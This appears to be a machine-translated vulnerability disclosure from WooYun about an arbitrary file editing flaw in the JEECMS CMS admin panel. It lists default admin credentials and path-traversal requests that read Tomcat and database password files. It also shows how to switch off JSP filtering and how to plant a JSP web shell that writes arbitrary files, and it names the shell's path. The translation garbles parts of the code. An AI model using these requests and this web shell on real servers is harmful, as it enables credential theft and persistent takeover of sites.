JEECMS background Arbitrary File editing vulnerability and official vulnerability and shell

JEECMS background Arbitrary File editing vulnerability and official demo site and official server security issues
Detailed Description: 2. x Background:
Login/Jeecms. do
3. x background:
Jeeadmin/jeecms/index. do
 
Default Account: admin
Default password: password
 
Get tomcat password:
/Jeeadmin/jeecms/template/v_edit.do? Root = ../conf/& name = ../conf/tomcat-users.xml
 
 
Get JDBC database account password:
/Jeeadmin/jeecms/template/v_edit.do? Root = % 2FWEB-INF % 2 Fconfig % 2F & name = % 2FWEB-INF % 2 Fconfig % 2Fjdbc. properties
JEECMS2.x read path:
Admin/core/template/Com_edit.do? RelPath = \.../../classes/jdbc. properties
 
 
 
Modify web. xml to cancel jsp Filtering:
/Jeeadmin/jeecms/template/v_edit.do? Root = % 2FWEB-INF % 2F & name = % 2FWEB-INF % 2Fweb. xml
JEECMS2.x read path:
Admin/core/template/Com_edit.do? RelPath = \.../../web. xml
 
 
 
Modify install/install_setup.jsp:
/Jeeadmin/jeecms/template/v_edit.do? Root = % 2 Finstall % 2F & name = % 2 Finstall % 2Finstall_setup.jsp
JEECMS2.x read path:
Admin/core/template/Com_edit.do? RelPath = \.../install \ install_setup.jsp
 
 
 
Insert a Jsp sentence:
<%
If (request. getParameter ("f ")! = Null) (new java. io. FileOutputStream (application. getRealPath ("\") + request. getParameter
 
("F"). write (request. getParameter ("t"). getBytes ());
%>
 
Modified one-sentence directory
/Install/install_setup.jsp
 
The jsp Trojan directory after a successful connection in one sentence:
/Ma. jsp
 
Proof of vulnerability:
 
 
 




 
Solution: repair: fix the official server first, you know.


The author sneaked into the night @ wooyun